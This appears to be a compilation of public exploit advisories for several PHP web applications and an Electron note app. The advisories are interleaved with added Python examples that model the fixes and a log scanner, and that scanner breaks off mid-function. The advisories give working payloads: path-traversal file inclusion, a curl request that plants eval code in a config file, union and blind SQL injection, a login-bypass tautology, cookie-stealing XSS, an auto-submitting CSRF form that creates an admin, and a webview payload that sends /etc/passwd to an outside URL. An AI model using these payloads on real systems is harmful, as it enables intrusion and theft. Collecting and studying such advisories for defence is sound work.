
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on:  Windows 7, 10 using XAMPP

# Vulnerability Type: LFI + Path Traversal

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
traversal and Local File Inclusion through the lang parameter in a
/?lang=PATH+TRAVERSAL+FILE (without the .php extension) GET request, because
locale/function.php passes the value to include_once.

Proof of concept:

To detect: http://localhost/youphptube/index.php?lang=)

An error is generated:

Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47

In locale/function.php we can see:

// filter some security here
if (!empty($_GET['lang'])) {
    $_GET['lang'] = str_replace(array("'", '"', "&quot;", "&#039;"), array('', '', '', ''), xss_esc($_GET['lang']));
}

if (empty($_SESSION['language'])) {
    $_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
    $_GET['lang'] = strip_tags($_GET['lang']);
    $_SESSION['language'] = $_GET['lang'];
}
@include_once "{$global['systemRootPath']}locale/{$_SESSION['language']}.php";


The "lang" parameter can therefore be modified to include an arbitrary PHP file on the server.


In the document root, create /phpinfo.php with this content:

<?php echo phpinfo(); ?>


To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo

Note: phpinfo without ".php".

The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";

The PHP information is then displayed in the browser.
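As an added example (not code from the advisory or from the YouPHPTube project), the following Python models the filtering chain shown above and the include path it produces, then shows the check that actually closes the hole: an allowlist of shipped locale names plus a canonical-path test. The root directory and locale list are constructed for the example, and xss_esc is left out because its body is not on the page. The same check applies to any parameter that selects a file to include, such as the template and squelette parameters in the YesWiki advisories further down this page.

```python
import posixpath
import re

# Constructed values for this example; not the project's own root or locale list.
SYSTEM_ROOT = "/var/www/youphptube/"
AVAILABLE_LOCALES = {"en", "es", "pt-br"}


def original_filter(lang: str) -> str:
    """Model of the filtering shown above: the quote/entity str_replace and
    strip_tags (xss_esc is not shown on the page and is left out here).
    None of these steps touch '.', '/' or '..', so traversal passes through."""
    for needle in ("'", '"', "&quot;", "&#039;"):
        lang = lang.replace(needle, "")
    return re.sub(r"<[^>]*>", "", lang)  # crude stand-in for PHP strip_tags


def included_path(lang: str) -> str:
    """The file include_once ends up opening: {systemRootPath}locale/{lang}.php."""
    return posixpath.normpath(posixpath.join(SYSTEM_ROOT, "locale", lang + ".php"))


def escapes_locale_dir(lang: str) -> bool:
    """True when the resolved include path lies outside the locale directory."""
    locale_dir = posixpath.normpath(posixpath.join(SYSTEM_ROOT, "locale"))
    return posixpath.commonpath([included_path(lang), locale_dir]) != locale_dir


def safe_locale(lang: str):
    """Allowlist check: accept only a short language tag naming a shipped locale.
    Anything else returns None so the caller keeps the configured default
    instead of interpolating user input into an include path."""
    if not re.fullmatch(r"[A-Za-z]{2,3}(-[A-Za-z]{2,4})?", lang):
        return None
    tag = lang.lower()
    return tag if tag in AVAILABLE_LOCALES else None


if __name__ == "__main__":
    for candidate in ("en", "pt-BR", "../../phpinfo", "<b>en</b>"):
        filtered = original_filter(candidate)
        print(f"{candidate!r:18} after filter={filtered!r:18} "
              f"include={included_path(filtered)} "
              f"escapes={escapes_locale_dir(filtered)} allowlist={safe_locale(candidate)}")
```

The run makes the point that stripping quotes and tags leaves ../../phpinfo untouched, while the allowlist rejects it without any knowledge of the filesystem; the canonical-path test is a second, independent layer for code paths that must accept a path-like value.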



# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: YouPHPTube 7.8 and earlier does not sufficiently
encode user-controlled input, resulting in reflected Cross-Site Scripting
(XSS) via the redirectUri parameter of
/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>.

Proof of concept:

http://localhost/<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
            
# Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution
# Google Dork: intext:"Powered by YouPHPTube"
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://www.youphptube.com/
# Version: <= 7.4
# Tested on: Ubuntu 18.04.1

YouPHPTube before 7.5 performs no checks at all when asked to generate a new
config file. We can use this to generate our own config file containing our
own (malicious) code.

All you need is a MySQL server that allows remote connections.

Fixed by the following commit:

    https://github.com/YouPHPTube/YouPHPTube/commit/b32b410c9191c3c5db888514c29d7921f124d883

Proof-of-Concept:

    # Run this command (with your own data replaced)
    # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution!
    curl -s "https://domain.tld/install/checkConfiguration.php" --data "contactEmail=rce@zerodays.lol&createTables=2&mainLanguage=RCE&salt=';eval(\$_REQUEST['zerodayslol']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=<URL>&webSiteTitle=Zerodays.lol&databaseHost=<DB_HOST>&databaseName=<DB_NAME>&databasePass=<DB_PASS>&databasePort=<DB_PORT>&databaseUser=<DB_USER>"
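An added example, not part of the advisory or of the YouPHPTube fix linked above, written in Python as a model of what an installer should do before writing configuration. It shows the two controls the request above bypasses: a lock that refuses to regenerate configuration on an installed site, and escaping of values written into a PHP file so that a quote in salt cannot terminate the string literal. Function and file names are illustrative.

```python
import os
import re

PHP_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def php_single_quoted(value: str) -> str:
    """Serialise a string as a PHP single-quoted literal.  Inside '...' PHP only
    interprets \\ and \', so escaping those two characters is sufficient."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config_unsafe(values: dict) -> str:
    """Raw interpolation, the pattern the advisory above abuses: a quote in a
    value closes the literal and whatever follows becomes PHP code."""
    return "<?php\n" + "".join(f"${k} = '{v}';\n" for k, v in values.items())


def render_config_safe(values: dict) -> str:
    """Validate each variable name and escape each value; the written file can
    only ever contain string assignments."""
    out = ["<?php\n"]
    for key, value in values.items():
        if not PHP_IDENT.fullmatch(key):
            raise ValueError(f"invalid config key: {key!r}")
        out.append(f"${key} = {php_single_quoted(str(value))};\n")
    return "".join(out)


def config_locked(config_path: str) -> bool:
    """Installer gate: once the configuration exists, generation is finished."""
    return os.path.exists(config_path)


def write_config(values: dict, config_path: str) -> str:
    """Refuse to (re)generate configuration on an installed site, then write the
    escaped form.  Returns the rendered text."""
    if config_locked(config_path):
        raise PermissionError("installation already completed; refusing to overwrite config")
    rendered = render_config_safe(values)
    with open(config_path, "w", encoding="utf-8") as fh:
        fh.write(rendered)
    return rendered


if __name__ == "__main__":
    # Constructed value shaped like the salt in the advisory's request.
    salt = "';eval($_REQUEST['zerodayslol']);echo '"
    print(render_config_unsafe({"salt": salt}))
    print(render_config_safe({"salt": salt}))
```

Escaping is the second line of defence; the first is that install/checkConfiguration.php should not be reachable at all once installation has completed (remove or block the install directory), which the lock models.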
            
# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The "user" and "pass" parameters of the user registration function are vulnerable to SQL injection. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and, for example, read the hashed credentials of an administrator.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:

- Boolean-based blind
- Error-based
- AND/OR time-based blind

The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
            
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Steps-To-Reproduce:
Step 1 – Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 – Enter the default admin username janobe and enter the password test
Step 3 – Click on Sign in and capture the request in Burp Suite
Step 4 – Change the user_email to janobe' or '1'='1
Step 5 – Click forward and you will now be logged in as admin.

POC 

POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user_email=janobe' or '1'='1&user_pass=test&btnLogin=
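Added example, not from either advisory or from the projects themselves: a runnable Python/sqlite3 model of the login check, showing the same janobe' or '1'='1 input against a string-built query and against a parameterised one. The same fix applies to the user and pass parameters of userCreate.json.php in the YouPHPTube advisory above. The table, credentials and hashing are constructed for the example.

```python
import hashlib
import sqlite3


def password_hash(password: str) -> str:
    # sha256 keeps the example dependency-free; a real login should use a slow
    # password hash such as bcrypt or argon2.
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_email TEXT, user_pass TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("janobe", password_hash("correct-horse"), "admin"))
    conn.commit()
    return conn


def login_vulnerable(conn, user_email: str, user_pass: str):
    """String-built query of the kind the login bypass above relies on.
    user_email = janobe' or '1'='1 turns the WHERE clause into
    user_email='janobe' OR ('1'='1' AND user_pass='...'), whose first term
    is true regardless of the password."""
    query = ("SELECT user_email, role FROM users WHERE user_email='" + user_email
             + "' AND user_pass='" + password_hash(user_pass) + "'")
    return conn.execute(query).fetchone()


def login_fixed(conn, user_email: str, user_pass: str):
    """Bound parameters: the quote stays inside the data and never reaches the parser."""
    return conn.execute(
        "SELECT user_email, role FROM users WHERE user_email=? AND user_pass=?",
        (user_email, password_hash(user_pass)),
    ).fetchone()


def create_user_fixed(conn, user_email: str, user_pass: str) -> int:
    """Parameterised INSERT for the registration path; returns the row count."""
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (user_email, password_hash(user_pass), "user"))
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = build_db()
    bypass = "janobe' or '1'='1"
    print("vulnerable:", login_vulnerable(db, bypass, "test"))  # the admin row
    print("fixed:     ", login_fixed(db, bypass, "test"))       # None
```

With placeholders the registration path stores the literal string tes'INJECTHERE as a user name, which is exactly what one wants: the quote is data, and it can still be logged in with later by the same parameterised query.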
            
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product.

The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--
            
# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://yot.sourceforge.io/
# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip
# Version: 3.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:21:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:32:28 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
            
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
#  _  _            _    _    _             ___                      _  _         
# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
            
<!--
# Exploit Title: Yona CMS <= 1.3.x Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://yonacms.com
# Software Link: https://github.com/oleksandr-torosh/yona-cms/
# Version: 1.3.x
# Tested on: Ubuntu 16.04

Yona CMS is vulnerable to a CSRF attack (no CSRF token in place), meaning
that if an admin user can be tricked into visiting a crafted URL created by
the attacker (via spear phishing/social engineering), a form will be submitted
to http://localhost/admin/admin-user/add that adds a new user as
administrator.
Once exploited, the attacker can log in to the admin panel
(http://localhost/admin) using the username and password he posted in the
form.

CSRF PoC Code
=============
-->

<form method="post" action="http://localhost/admin/admin-user/add">   
<input type="hidden" name="login" value="attacker"/>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="name" value="attacker"/>
<input type="hidden" name="role" value="admin"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>
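Added example, not Yona CMS code: a Python model of the token check the admin-user/add handler lacks, using an HMAC token bound to the session together with an Origin header check. The secret, session id and site origin are constructed for the example.

```python
import hashlib
import hmac
import secrets
import time

# Per-process secret for this example; a real deployment keeps it in configuration.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_MAX_AGE = 3600
SITE_ORIGIN = "http://localhost"  # assumed origin of the admin panel on this page


def _mac(session_id: str, ts: str) -> str:
    return hmac.new(SERVER_SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()


def issue_token(session_id: str, now=None) -> str:
    """Token = timestamp.HMAC(secret, session_id|timestamp): bound to one session,
    unforgeable without the secret, and expiring after TOKEN_MAX_AGE seconds."""
    ts = str(int(time.time() if now is None else now))
    return f"{ts}.{_mac(session_id, ts)}"


def verify_token(session_id: str, token, now=None) -> bool:
    if not token or "." not in token:
        return False
    ts, mac = token.split(".", 1)
    if not ts.isdigit():
        return False
    current = int(time.time() if now is None else now)
    if not (0 <= current - int(ts) <= TOKEN_MAX_AGE):
        return False
    return hmac.compare_digest(_mac(session_id, ts), mac)


def handle_admin_user_add(session_id: str, form: dict, origin=None):
    """Gate the /admin/admin-user/add handler must pass before creating anything.
    The Origin check rejects the cross-site case early; the token check is the
    actual defence, since the attacker's page cannot read a token bound to the
    victim's session."""
    if origin is not None and origin != SITE_ORIGIN:
        return False, "cross-origin request rejected"
    if not verify_token(session_id, form.get("csrf_token")):
        return False, "missing or invalid CSRF token"
    return True, f"user {form.get('login')!r} created with role {form.get('role')!r}"


if __name__ == "__main__":
    sid = "victim-session"
    forged = {"login": "attacker", "role": "admin"}  # the PoC form: no token at all
    print(handle_admin_user_add(sid, forged, origin="http://attacker.example"))
    print(handle_admin_user_add(sid, forged))
    print(handle_admin_user_add(sid, {**forged, "csrf_token": issue_token(sid)}, origin=SITE_ORIGIN))
```

The PoC form above submits without any csrf_token field, so the handler refuses it, and a token issued for another session fails because the MAC covers the session id. Web frameworks normally supply this; the hand-written version shows what the supplied one must guarantee.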
            
# # # # # 
# Exploit Title: Yoga Class Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/yoga-class-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
# 
# -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
# 
# http://server/list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
# 
# # # # #
            
# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux

## Description 
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump the database through arbitrary SQL commands.

## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

This request causes a fatal error in the web application. After appending "'%2b(select*from(select(sleep(10)))a)%2b'" to the "cid" parameter, the response was still a 200 OK, but it arrived 10 seconds later, which indicates that our sleep(10) command was executed.

```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

## Exploit with sqlmap
Save the request from Burp to a file (sqli.txt below) and run:
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2

---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```

## The "id" parameters in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable and can be exploited in the same way.
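Added example, not from any advisory on this page: detection logic in Python run over constructed access-log lines shaped like the probes on this page, including the sleep()-based request above, the uniON/SElEcT and /*!01111UNION*/ spellings from the Yot CMS and Yoga Class Script advisories, and the 500-on-a-single-quote response described above. The log format, client addresses and timings are constructed, and the thresholds are illustrative.

```python
import re
import urllib.parse

# Constructed access-log lines (not real traffic) shaped like the requests on this page:
# client, timestamp, request line, status, response time in seconds.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Mar/2023:16:00:01 +0000] "GET /php-ycrs/?p=yclasses%2fregistration&cid=2 HTTP/1.1" 200 0.041
192.0.2.10 - - [19/Mar/2023:16:00:02 +0000] "GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1" 500 0.039
192.0.2.10 - - [19/Mar/2023:16:00:15 +0000] "GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1" 200 10.052
192.0.2.11 - - [01/Nov/2018:23:21:17 +0000] "GET /index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e HTTP/1.1" 200 0.120
192.0.2.12 - - [09/Dec/2017:10:00:00 +0000] "GET /list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3&main_search= HTTP/1.1" 200 0.090
192.0.2.13 - - [19/Mar/2023:16:01:00 +0000] "GET /php-ycrs/?p=yclasses%2fview_class&id=2 HTTP/1.1" 200 0.030
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<secs>[\d.]+)$'
)

# Rules are matched against the normalised query string, not the raw one.
SQLI_RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b")),
    ("sleep", re.compile(r"\bsleep\s*\(")),
    ("benchmark", re.compile(r"\bbenchmark\s*\(")),
    ("tautology", re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+")),
]
SLOW_SECONDS = 5.0


def normalize(value: str) -> str:
    """Undo the tricks the payloads above use: percent-decode twice, treat '+'
    as space, strip MySQL /*!NNNNN ... */ version-comment wrappers, collapse
    whitespace and lowercase, so uniON/SElEcT and /*!01111UNION*/ both read 'union'."""
    v = urllib.parse.unquote_plus(urllib.parse.unquote_plus(value))
    v = re.sub(r"/\*!\d*", " ", v).replace("*/", " ")
    return re.sub(r"\s+", " ", v).lower()


def scan_log(text: str):
    """Return (client, target, reasons) for every request that looks like an
    injection probe or shows the timing side effect of a time-based probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        norm = normalize(urllib.parse.urlsplit(m["target"]).query)
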